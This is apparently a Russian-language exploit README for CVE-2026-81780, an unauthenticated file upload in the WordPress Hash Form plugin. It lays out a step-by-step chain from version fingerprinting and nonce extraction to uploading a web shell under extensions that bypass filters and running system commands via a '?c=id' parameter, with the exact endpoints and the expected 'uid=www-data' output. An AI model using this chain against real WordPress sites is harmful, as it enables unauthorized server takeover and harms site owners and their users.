
Эксплойт для CVE-2026-81780: неаутентифицированная загрузка файлов в плагине WordPress Hash Form, приводящая к удалённому выполнению кода через специально сформированные PHP-нагрузки.
CVE-2026-81780 — Hash Form RCE
Уязвимость
Неаутентифицированная загрузка файлов в плагине WordPress Hash Form (≤ 1.4.2). Плагин позволяет загружать произвольные файлы без надлежащей аутентификации или проверки типа файла, что приводит к удалённому выполнению кода (RCE).
Цепочка эксплуатации
Шаг Действие 1 Атакующий проверяет наличие плагина Hash Form через readme.txt 2 Извлекает ajax_nounce, просматривая формы (hashform_preview) 3 Отправляет POST-запрос на hashform_file_upload_action с PHP-полезной нагрузкой 4 Загружает веб-шелл как .phar, .phtml, .php5 или .php7 5 Запускает шелл, обращаясь к /wp-content/uploads/hashform/temp/v.{ext} 6 Выполняет системные команды через ?c=id
GET /wp-content/plugins/hash-form/readme.txt
↓
Обнаружена версия (≤ 1.4.2)
↓
GET /wp-admin/admin-ajax.php?action=hashform_preview&form=1
↓
Извлечение Nonce: ajax_nounce=...
↓
POST /wp-admin/admin-ajax.php?action=hashform_file_upload_action
↓
Загрузка: v.phar (или .phtml, .php5, .php7)
↓
GET /wp-content/uploads/hashform/temp/v.phar?c=id
↓
Команда выполнена (uid=www-data)```